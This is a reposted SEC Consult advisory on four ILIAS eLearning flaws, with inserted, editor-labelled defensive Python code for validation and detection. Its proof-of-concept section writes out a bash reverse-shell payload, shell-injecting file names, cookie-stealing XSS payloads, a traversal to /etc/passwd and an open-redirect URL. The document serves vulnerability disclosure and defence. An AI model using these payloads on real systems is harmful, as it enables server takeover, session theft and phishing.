I Need Hack - Hacking Tutorials, News, Tips

ILIAS eLearning 7.15 Command injection / XSS / FI / OpenRedirect

by Ineedhack
December 9, 2022
in Exploits

SEC Consult Vulnerability Lab Security Advisory 20221206-0
=======================================================================
              title: Multiple critical vulnerabilities
            product: ILIAS eLearning Platform
 vulnerable version: <= 7.15
      fixed version: 7.16
        CVE numbers: CVE-2022-45915, CVE-2022-45916, CVE-2022-45917, CVE-2022-45918
             impact: critical
           homepage: https://www.ilias.de
              found: 2022-09-30
                 by: Anna Hartig (Office Bochum)
                     Constantin Schwarz (Office Bochum)
                     Niklas Schilling (Office Munich)
                     SEC Consult Vulnerability Lab
                     A part of SEC Consult, an Atos company
                     Asia
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"ILIAS has been around since 1998. It is an effective learning management system which fulfills all of your needs. It integrates tools for small and large companies, universities, schools, and the public sector to create custom, individual learning scenarios."

Source: https://www.ilias.de/en/

Business recommendation:
------------------------
The vendor provides a patch which should be applied immediately.

SEC Consult strongly recommends performing a thorough security review of the product by security professionals to identify and resolve potential further security issues.

Vulnerability overview/description:
-----------------------------------
1) Authenticated Direct OS Command Injection (CVE-2022-45915)

ILIAS uses several third-party programs for tasks such as creating PDFs or scanning uploaded files for viruses. These programs are invoked through the PHP exec() function. In several places, the arguments passed to exec() contain user input that has not been sanitized properly. By uploading crafted files or making malicious configuration changes, an attacker is able to execute arbitrary system commands with the permissions of the web server user (www-data). The privileges required for the different command injection instances range from low user rights to administrator rights.

2) Stored Cross-Site Scripting (CVE-2022-45916)

Multiple stored cross-site scripting vulnerabilities were identified in ILIAS course items. They were possible either by bypassing an existing XSS filter or simply because input validation was missing entirely. As a result, attacker-controlled JavaScript code is executed in the browser of the victim. An attacker needs the right to create course content, e.g. as a tutor of a course.

3) Local File Inclusion (CVE-2022-45918)

The SCORM editor includes a debugger which gives authors insight into the current session of the SCORM player and into all previous sessions. When accessing the logs of previous sessions, the debugger fails to validate the requested file path, which allows arbitrary read access to the server's file system.

4) Open Redirect (CVE-2022-45917)

The script shib_logout.php redirects the user to the URL given in the "return" parameter. Since this parameter is not validated, an attacker can use it to redirect victims to arbitrary websites. This is a powerful tool for phishing campaigns, because a malicious website can be hidden behind a link that appears to lead to the genuine ILIAS website.

Proof of concept:
-----------------
1) Authenticated Direct OS Command Injection (CVE-2022-45915)

Multiple command injection vulnerabilities were identified in different places:

a) Upload of ZIP archives

Users with normal user rights can submit their solutions by uploading a ZIP archive. The archive is extracted on the server and then recursively scanned for viruses. An attacker can inject system commands through the directory and file names contained in the archive, e.g. by including a directory named $(touch /tmp/pwned) in the ZIP archive. An attacker exploiting this vulnerability is able to obtain a reverse shell on the ILIAS web server with the rights of the web server user (www-data).

b) Creation of media objects

ILIAS can be configured so that users can create media objects from files inside an "upload directory". Before these objects are created, the files are scanned for viruses. An attacker can use the file names to inject system commands: by placing a file named $(touch /tmp/pwned) inside the upload directory and then creating a media object from it, an attacker is able to execute system commands on the server with the rights of www-data.

c) Creation of PDF documents

ILIAS allows users to export their content as PDF files. A user with administrator rights can configure the path of the PDF rendering program of their choice. An attacker can use this parameter to inject system commands, because missing validation makes it possible to append further commands to the path. ILIAS requires that the path contains wkhtmltopdf, so this string has to be part of the payload. Changing the path to

/usr/local/bin/wkhtmltopdf; bash -c "bash -i >& /dev/tcp//13373 0>&1";

allows an attacker to open a reverse shell with www-data rights which connects to port 13373 on the attacker's machine. The reverse shell is initiated as soon as the export function is triggered. This vulnerability can be exploited without a PDF renderer being installed.
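The three cases above, and item 1 of the overview, share one root cause: a user-controlled file name or configured path is concatenated into a command string that exec() hands to a shell. The following Python example is added here by the editor and is neither ILIAS code nor part of the SEC Consult advisory. It shows the vulnerable pattern beside its hardened form using Python's subprocess (the same distinction PHP draws between a raw exec() string and escapeshellarg() or an argument array), a detection helper for hostile archive entry names, and a validator for the administrator-configured renderer path. /bin/echo is a constructed stand-in for the virus scanner, and all function names are the editor's assumptions.

```python
"""Unsafe vs. safe invocation of an external program on user-controlled
file names, the pattern behind the three command injection cases above.
Stand-alone example; not ILIAS code."""
import re
import shlex
import subprocess

# Constructed stand-in for a virus scanner: /bin/echo prints its arguments,
# so the output shows exactly what a real scanner would receive as its
# file argument.
SCANNER = "/bin/echo"

# Characters that carry meaning on a POSIX shell command line.
SHELL_META = re.compile(r"""[;&|`$(){}<>\\"' \t\n*?\[\]~#!]""")


def scan_unsafe(path: str) -> str:
    """Vulnerable pattern: the file name is concatenated into a shell
    command string, the Python analogue of PHP exec("scanner " . $path).
    A name such as "$(echo INJECTED)" is expanded by the shell before the
    scanner ever runs."""
    cmd = f"{SCANNER} {path}"
    return subprocess.run(cmd, shell=True, capture_output=True,
                          text=True).stdout.strip()


def scan_safe(path: str) -> str:
    """Hardened: argv list and no shell, so the name reaches the scanner as
    one literal argument whatever characters it contains."""
    return subprocess.run([SCANNER, path], capture_output=True,
                          text=True).stdout.strip()


def scan_safe_shell(path: str) -> str:
    """If a shell command string is unavoidable, quote every untrusted
    argument (the equivalent of PHP escapeshellarg())."""
    cmd = f"{SCANNER} {shlex.quote(path)}"
    return subprocess.run(cmd, shell=True, capture_output=True,
                          text=True).stdout.strip()


def suspicious_names(names):
    """Detection aid: archive entries whose names would be interpreted by
    an unquoted shell command line. Worth logging or alerting on in an
    upload handler even after the invocation itself has been fixed."""
    return [n for n in names if SHELL_META.search(n)]


# The administrator-configured renderer path (case c): a plain absolute
# path with no shell metacharacters and no ".." components.
RENDERER_PATH = re.compile(r"/[A-Za-z0-9_./-]+")


def validate_renderer_path(configured: str) -> bool:
    """Accept only a plain absolute path so that "; bash -c ..." can never
    be appended. Checking that the file exists and is executable is a
    separate runtime check, deliberately left out here."""
    if not RENDERER_PATH.fullmatch(configured):
        return False
    return ".." not in configured.split("/")


if __name__ == "__main__":
    name = "$(echo INJECTED)"                  # constructed hostile file name
    print("unsafe :", scan_unsafe(name))       # INJECTED
    print("safe   :", scan_safe(name))         # $(echo INJECTED)
    print("quoted :", scan_safe_shell(name))   # $(echo INJECTED)
    print(suspicious_names(["report.pdf", "$(touch /tmp/pwned)"]))
    print(validate_renderer_path("/usr/local/bin/wkhtmltopdf"))
    print(validate_renderer_path('/usr/local/bin/wkhtmltopdf; bash -c "x"'))
```

Running the block prints INJECTED for the unsafe call and the literal file name for the two safe ones. The renderer check stays compatible with the ILIAS requirement that the path contains wkhtmltopdf, because the injection shown above depends on ";" and whitespace, which the allowlist refuses.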

2) Stored Cross-Site Scripting (CVE-2022-45916)

Multiple instances of stored cross-site scripting were identified:

a) Several stored XSS in tests

An attacker with the right to create new tests is able to embed JavaScript code. The XSS payload is triggered as soon as a victim later accesses one of these tests. The "Question" input field of a test has a filter which correctly removes HTML tags like <script>. This filter is easily bypassed by using half-open HTML tags, e.g.

<img src="x" onerror="alert(document.cookie)"

This HTML tag can be used in the "Introductory message" section of a test to trigger an XSS. The JavaScript code is terminated by the quotation mark or the space which separates the HTML tag from the subsequent HTML tags incorporated in the test.

Finally, the "Question" input field of the question type "Long Menu" was found to have no filtering at all, which allows the use of any HTML tag, such as <script>.

b) Stored XSS in the title of course items

An attacker with the right to create an arbitrary course item is able to perform a stored XSS attack by changing the title of the element to

" onclick="alert(document.cookie)"

The XSS payload is triggered by clicking on the button right above the title.

c) Stored XSS in HTML sites

An attacker with the right to edit an HTML learning module is able to perform a stored XSS attack, because adding JavaScript code to the HTML pages is allowed. Even if this is intended, it can be considered insecure behaviour and bad practice.

3) Local File Inclusion (CVE-2022-45918)

The SCORM debugger has to be activated for the whole ILIAS platform. An attacker can then access the SCORM player debugger and request the logs of a previous session. By changing the value of the "logFile" query parameter of this request, arbitrary files of the server's file system can be read. To read e.g. the passwd file on Linux systems, an attacker changes the value of the logFile parameter to "../../../../../../../../../etc/passwd".
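For the logFile parameter case above (item 3 in the overview), the fix is to treat the parameter as a name inside one directory, never as a path. The Python example below is an editor's addition, not ILIAS code and not part of the advisory; the log directory, the file names and the function names are constructed for the example. resolve_log_file shows the containment check, including the symlink case that a pure string check misses, and looks_like_traversal is a detection aid for request logs that also catches URL-encoded variants.

```python
"""Constraining a user-supplied file name (the logFile parameter case
above) to one directory, plus a detection helper for traversal attempts
in request logs. Stand-alone example; not ILIAS code."""
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Allowlist for the file name itself: no separators, no dots except the
# extension, bounded length. Whatever does not match is rejected outright.
LOG_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.log")


def resolve_log_file(log_dir, requested: str) -> Path:
    """Map a requested log name to a file that is directly inside log_dir.
    Rejects traversal, absolute paths, NUL bytes, and symlinks pointing out
    of the directory (resolve() follows them before the check)."""
    base = Path(log_dir).resolve()
    if not LOG_NAME.fullmatch(requested):
        raise ValueError(f"rejected log file name: {requested!r}")
    target = (base / requested).resolve()
    if target.parent != base:
        raise ValueError(f"{requested!r} escapes {base}")
    if not target.is_file():
        raise FileNotFoundError(requested)
    return target


# Detection: traversal sequences after up to two rounds of URL decoding,
# so %2e%2e and double-encoded %252e%252e variants are caught as well.
TRAVERSAL = re.compile(r"(\.\./|\.\.\\|^\.\.$|^/|^[A-Za-z]:\\|\x00)")


def looks_like_traversal(raw_param: str) -> bool:
    """True if the raw query parameter value looks like a path traversal
    attempt; intended for alerting on web server or application logs."""
    decoded = raw_param
    for _ in range(2):
        decoded = unquote(decoded)
    return bool(TRAVERSAL.search(decoded))


def demo() -> dict:
    """Builds a constructed log directory in a temp dir with one legitimate
    log and one symlink escaping the directory, then exercises the check."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp) / "scorm_logs"
        base.mkdir()
        (base / "session-42.log").write_text("constructed sample log\n")
        outside = Path(tmp) / "secret.txt"
        outside.write_text("must never be readable via logFile\n")
        (base / "link.log").symlink_to(outside)

        results = {"valid": resolve_log_file(base, "session-42.log").read_text()}
        for name in ("../../../../../../../../../etc/passwd",   # from the advisory
                     "/etc/passwd",
                     "link.log",                                # symlink escape
                     "session-42.log\x00.txt"):                 # NUL truncation
            try:
                resolve_log_file(base, name)
                results[name] = "allowed"
            except (ValueError, FileNotFoundError):
                results[name] = "rejected"
        return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(repr(key), "->", repr(value))
    print(looks_like_traversal("..%2F..%2Fetc/passwd"))   # True
    print(looks_like_traversal("session-42.log"))          # False
```

The name allowlist does most of the work; the resolve()-and-parent comparison is the second line of defence for anything that slips into the directory by other means, such as a symlink planted through a different upload feature.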

4) Open Redirect (CVE-2022-45917)

The shib_logout function allows open redirection. A URL which successfully exploits this vulnerability to redirect to "https://www.sec-consult.com" is:

http://ILIAS-URL/shib_logout.php?action=logout&return=https://www.sec-consult.com
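For the "return" parameter above (item 4 in the overview), the defence is to redirect only to an allowlisted host or to a same-site path. The Python example below is an editor's addition, not ILIAS code and not part of the advisory; ilias.example.org, the log lines and the function names are constructed. safe_return_url shows the validation, including the scheme-relative, backslash and user@host forms that a naive string check gets wrong, and flag_external_redirects applies the same check to web server logs to surface past phishing links built on this vulnerability.

```python
"""Validating a post-logout "return" URL against an allowlist, plus a
small detector that flags foreign return targets in web server logs.
Stand-alone example; not ILIAS code. Host name and log lines are
constructed for this example."""
import re
from urllib.parse import parse_qs, urlsplit

ALLOWED_HOSTS = {"ilias.example.org"}   # assumed: the platform's own host(s)
DEFAULT_TARGET = "/"


def safe_return_url(value: str) -> str:
    """Return `value` only if it is a same-site absolute path or an http(s)
    URL whose host is allowlisted; otherwise fall back to DEFAULT_TARGET."""
    if not value:
        return DEFAULT_TARGET
    # Browsers treat "\" like "/" in URLs, so normalise before parsing;
    # otherwise "/\evil.example" would pass as a harmless relative path.
    candidate = value.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        # Absolute URL, or scheme-relative "//evil.example" (empty scheme).
        if parts.scheme.lower() not in ("http", "https"):
            return DEFAULT_TARGET
        # hostname is lower-cased and stripped of userinfo and port, so
        # "https://ilias.example.org@evil.example/" yields "evil.example".
        if (parts.hostname or "") not in ALLOWED_HOSTS:
            return DEFAULT_TARGET
        return candidate
    if not candidate.startswith("/"):
        return DEFAULT_TARGET
    return candidate


REQUEST_LINE = re.compile(r'"GET (\S+) HTTP/')


def flag_external_redirects(log_lines):
    """Return the 'return' values of shib_logout.php requests that the
    validator would have refused, i.e. links that sent users off-site."""
    flagged = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/shib_logout.php"):
            continue
        for value in parse_qs(url.query).get("return", []):
            if safe_return_url(value) != value:
                flagged.append(value)
    return flagged


SAMPLE_LOG = [  # constructed, not real traffic
    '10.0.0.5 - - [06/Dec/2022:10:00:01 +0000] "GET /shib_logout.php?action=logout&return=https%3A%2F%2Filias.example.org%2Flogin.php HTTP/1.1" 302 0',
    '10.0.0.9 - - [06/Dec/2022:10:00:07 +0000] "GET /shib_logout.php?action=logout&return=https%3A%2F%2Fwww.sec-consult.com HTTP/1.1" 302 0',
    '10.0.0.9 - - [06/Dec/2022:10:00:09 +0000] "GET /login.php HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for probe in ("https://www.sec-consult.com", "//evil.example/",
                  "/\\evil.example", "javascript:alert(1)",
                  "/ilias.php?baseClass=ilDashboardGUI"):
        print(repr(probe), "->", repr(safe_return_url(probe)))
    print(flag_external_redirects(SAMPLE_LOG))   # ['https://www.sec-consult.com']
```

Returning a fixed default instead of an error keeps the logout flow working for legitimate users while making the parameter useless for phishing; the log scan is the retrospective counterpart, worth running once against historic access logs after patching to 7.16.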

Vulnerable / tested versions:
-----------------------------
The vulnerabilities were identified in ILIAS version 7.14. A quick analysis of the source code showed that several versions older than 3.8.4 are vulnerable as well. It is therefore assumed that all current versions are affected.

Version 7.15 fixed the vulnerabilities only partially. A complete fix is available in version 7.16.

Vendor contact timeline:
------------------------
2022-10-07: Contacting vendor through [email protected]
2022-10-19
2022-10-25: Extending the email recipients to [email protected] or [email protected], personal email addresses provided on the vendor's website
2022-10-25: Sending the advisory to the provided contact
2022-10-30: Vendor requests more information
2022-10-31: Sending detailed PoC
2022-11-10: Asking for the current status
2022-11-22: Vendor confirms availability of patches by 2022-11-25
2022-11-22: Asking for the versions of the mentioned patches and for CVE IDs
2022-11-23: Vendor provides information on the patched version; CVE IDs to be assigned by SEC Consult
2022-11-24: Vendor releases patched version 7.16
2022-12-06: Public release of the security advisory

Solution:
---------
Upgrade to ILIAS version 7.16 or higher, available from the vendor's site:
https://docu.ilias.de/goto.php?target=st_229

Workaround:
-----------
None

Contact Us:
-----------
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult is an Atos company
Asia

About the SEC Consult Vulnerability Lab

The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendations about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested in working with the experts of SEC Consult?
Send us your application: https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices: https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: [email protected]
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF A. Hartig, C. Schwarz, N. Schilling / @2022
